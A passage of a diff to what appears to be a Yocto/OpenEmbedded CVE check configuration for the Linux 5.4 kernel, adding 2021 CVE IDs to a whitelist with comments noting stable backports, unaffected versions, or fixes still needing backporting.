+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3736"
+
+# cpe-stable-backport: Backported in 5.4.144
+CVE_CHECK_WHITELIST += "CVE-2021-3739"
+
+# cpe-stable-backport: Backported in 5.4.128
+CVE_CHECK_WHITELIST += "CVE-2021-3743"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-3744"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-3752"
+
+# cpe-stable-backport: Backported in 5.4.144
+CVE_CHECK_WHITELIST += "CVE-2021-3753"
+
+# cpe-stable-backport: Backported in 5.4.136
+CVE_CHECK_WHITELIST += "CVE-2021-37576"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2021-3759"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-3760"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-3764"
+
+# cpe-stable-backport: Backported in 5.4.157
+CVE_CHECK_WHITELIST += "CVE-2021-3772"
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-38160"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38166"
+
+# cpe-stable-backport: Backported in 5.4.141
+CVE_CHECK_WHITELIST += "CVE-2021-38198"
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-38199"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38200"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38201"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38202"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38203"
+
+# cpe-stable-backport: Backported in 5.4.136
+CVE_CHECK_WHITELIST += "CVE-2021-38204"
+
+# cpe-stable-backport: Backported in 5.4.141
+CVE_CHECK_WHITELIST += "CVE-2021-38205"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38206"
+
+# fixed-version: only affects 5.6rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38207"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-38208"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38209"
+
+# cpe-stable-backport: Backported in 5.4.153
+CVE_CHECK_WHITELIST += "CVE-2021-38300"
+
+# CVE-2021-3847 has no known resolution
+
+# CVE-2021-3864 has no known resolution
+
+# CVE-2021-3892 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.155
+CVE_CHECK_WHITELIST += "CVE-2021-3894"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-3896"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2021-3923"
+
+# cpe-stable-backport: Backported in 5.4.144
+CVE_CHECK_WHITELIST += "CVE-2021-39633"
+
+# cpe-stable-backport: Backported in 5.4.70
+CVE_CHECK_WHITELIST += "CVE-2021-39634"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2021-39636"
+
+# cpe-stable-backport: Backported in 5.4.89
+CVE_CHECK_WHITELIST += "CVE-2021-39648"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-39656"
+
+# cpe-stable-backport: Backported in 5.4.93
+CVE_CHECK_WHITELIST += "CVE-2021-39657"
+
+# cpe-stable-backport: Backported in 5.4.165
+CVE_CHECK_WHITELIST += "CVE-2021-39685"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-39686"
+
+# cpe-stable-backport: Backported in 5.4.165
+CVE_CHECK_WHITELIST += "CVE-2021-39698"
+
+# fixed-version: Fixed after version 4.18rc6
+CVE_CHECK_WHITELIST += "CVE-2021-39711"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2021-39713"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2021-39714"
+
+# CVE-2021-39800 has no known resolution
+
+# CVE-2021-39801 has no known resolution
+
+# CVE-2021-39802 has no known resolution
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4001"
+
+# cpe-stable-backport: Backported in 5.4.162
+CVE_CHECK_WHITELIST += "CVE-2021-4002"
+
+# CVE-2021-4023 needs backporting (fixed from 5.15rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4028"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4032"
+
+# cpe-stable-backport: Backported in 5.4.241
+CVE_CHECK_WHITELIST += "CVE-2021-4037"
+
+# cpe-stable-backport: Backported in 5.4.145
+CVE_CHECK_WHITELIST += "CVE-2021-40490"
+
+# cpe-stable-backport: Backported in 5.4.164
+CVE_CHECK_WHITELIST += "CVE-2021-4083"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4090"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4093"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4095"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-41073"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-4135"
+
+# CVE-2021-4148 needs backporting (fixed from 5.15)
+
+# cpe-stable-backport: Backported in 5.4.155
+CVE_CHECK_WHITELIST += "CVE-2021-4149"
+
+# CVE-2021-4150 needs backporting (fixed from 5.15rc7)
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-4154"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2021-4155"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-4157"
+
+# cpe-stable-backport: Backported in 5.4.210
+CVE_CHECK_WHITELIST += "CVE-2021-4159"
+
+# cpe-stable-backport: Backported in 5.4.153
+CVE_CHECK_WHITELIST += "CVE-2021-41864"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2021-4197"
+
+# cpe-stable-backport: Backported in 5.4.143
+CVE_CHECK_WHITELIST += "CVE-2021-42008"
+
+# cpe-stable-backport: Backported in 5.4.162
+CVE_CHECK_WHITELIST += "CVE-2021-4202"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-4203"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4204"
+
+# CVE-2021-4218 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.148
+CVE_CHECK_WHITELIST += "CVE-2021-42252"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-42327"
+
+# cpe-stable-backport: Backported in 5.4.158
+CVE_CHECK_WHITELIST += "CVE-2021-42739"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-43056"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-43057"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-43267"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-43389"
+
+# cpe-stable-backport: Backported in 5.4.164
+CVE_CHECK_WHITELIST += "CVE-2021-43975"
+
+# cpe-stable-backport: Backported in 5.4.174
+CVE_CHECK_WHITELIST += "CVE-2021-43976"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-44733"
+
+# cpe-stable-backport: Backported in 5.4.260
+CVE_CHECK_WHITELIST += "CVE-2021-44879"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2021-45095"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-45100"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-45402"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-45469"
+
+# fixed-version: only affects 5.13rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-45480"
+
+# cpe-stable-backport: Backported in 5.4.133
+CVE_CHECK_WHITELIST += "CVE-2021-45485"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-45486"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-45868"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46283"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2021-46904"
+
+# fixed-version: only affects 5.12rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46905"
+
+# cpe-stable-backport: Backported in 5.4.127
+CVE_CHECK_WHITELIST += "CVE-2021-46906"
+
+# CVE-2021-46908 needs backporting (fixed from 5.12rc8)
+
+# cpe-stable-backport: Backported in 5.4.114
+CVE_CHECK_WHITELIST += "CVE-2021-46909"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46910"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46911"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46912"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46913"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46914"
+
+# cpe-stable-backport: Backported in 5.4.114
+CVE_CHECK_WHITELIST += "CVE-2021-46915"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46916"
+
+# fixed-version: only affects 5.8rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46917"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46918"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46919"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46920"
+
+# cpe-stable-backport: Backported in 5.4.115
+CVE_CHECK_WHITELIST += "CVE-2021-46921"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46922"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46923"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46924"
+
+# CVE-2021-46925 needs backporting (fixed from 5.16rc8)
+
+# CVE-2021-46926 needs backporting (fixed from 5.16rc7)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46927"
+
+# CVE-2021-46928 needs backporting (fixed from 5.16rc7)
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46929"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46930"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46931"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46932"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46933"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46934"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46935"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46936"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46937"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46938"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46939"
+
+# fixed-version: only affects 5.10rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46940"
+
+# CVE-2021-46941 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46942"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46943"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46944"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46945"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46947"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46948"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46949"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46950"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46951"
+
+# CVE-2021-46952 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46953"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46954"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46955"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46956"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46957"
+
+# fixed-version: only affects 5.7rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46958"
+
+# CVE-2021-46959 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46960"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46961"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46962"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46963"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46964"
+
+# CVE-2021-46965 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46966"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46967"
+
+# fixed-version: only affects 5.10rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46968"
+
+# CVE-2021-46969 needs backporting (fixed from 5.13rc1)
+
+# CVE-2021-46970 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.117
+CVE_CHECK_WHITELIST += "CVE-2021-46971"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46972"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46973"
+
+# cpe-stable-backport: Backported in 5.4.117
+CVE_CHECK_WHITELIST += "CVE-2021-46974"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46976"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46977"
+
+# fixed-version: only affects 5.11rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46978"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46979"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46980"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46981"
+
+# CVE-2021-46982 needs backporting (fixed from 5.13rc2)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46983"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46984"
+
+# fixed-version: only affects 5.12rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46985"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46986"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46987"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46988"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46989"
+
+# fixed-version: only affects 5.10rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46990"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46991"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46992"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46993"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46994"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46995"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46996"
+
+# fixed-version: only affects 5.10rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46997"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46998"
+
+# fixed-version: only affects 5.7rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46999"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47000"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47001"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47002"
+
+# fixed-version: only affects 5.11 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47003"
+
+# CVE-2021-47004 needs backporting (fixed from 5.13rc1)
+
+# CVE-2021-47005 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-47006"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47007"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47008"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47009"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47010"
+
+# fixed-version: only affects 5.11rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47011"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47012"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47013"
+
+# fixed-version: only affects 5.8rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47014"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47015"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47016"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47017"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47018"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47019"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47020"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47021"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47022"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47023"
+
+# CVE-2021-47024 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47025"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47026"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47027"
+
+# CVE-2021-47028 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47029"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47030"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47031"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47032"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47033"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47034"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47035"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47036"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47037"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47038"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47039"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47040"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47041"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47042"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47043"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47044"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47045"
+
+# CVE-2021-47046 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47047"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47048"
+
+# CVE-2021-47049 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47050"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47051"
+
+# CVE-2021-47052 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47053"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47054"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47055"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47056"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47057"
+
+# fixed-version: only affects 5.11rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47058"
+
+# CVE-2021-47059 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.9rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47060"
+
+# fixed-version: only affects 5.9rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47061"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47062"
+
+# CVE-2021-47063 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47064"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47065"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47066"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47067"
+
+# fixed-version: only affects 5.12rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47068"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47069"
+
+# CVE-2021-47070 needs backporting (fixed from 5.13rc3)
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-47071"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47072"
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-47073"
+
+# CVE-2021-47074 needs backporting (fixed from 5.13rc3)
+
+# CVE-2021-47075 needs backporting (fixed from 5.13rc3)
+
+# CVE-2021-47076 needs backporting (fixed from 5.13rc3)
+
+# CVE-2021-47077 needs backporting (fixed from 5.13rc3)
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-47078"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47079"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47080"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47081"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2021-47082"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47083"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47086"
+
+# fixed-version: only affects 5.14rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47087"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47088"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47089"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47090"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47091"
+
+# fixed-version: only affects 5.15rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47092"
+
+# fixed-version: only affects 5.9 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47093"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47094"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47095"
+
+# fixed-version: only affects 5.15rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47096"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47097"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47098"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47099"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47100"
+
+# CVE-2021-47101 needs backporting (fixed from 5.16rc7)
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47102"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2021-47103"
+
+# fixed-version: only affects 5.15 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47104"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47105"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47106"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47107"
+
